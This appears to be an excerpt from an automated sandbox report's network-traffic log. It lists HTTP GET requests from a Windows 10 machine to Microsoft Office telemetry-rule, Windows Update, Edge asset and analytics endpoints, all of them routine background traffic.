Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=GE8uW+ePrTFbte8&MD=dYbVHGlU HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b?rn=1731526789129&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=25B04BE6D989657B07C35ED0D82864B0&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
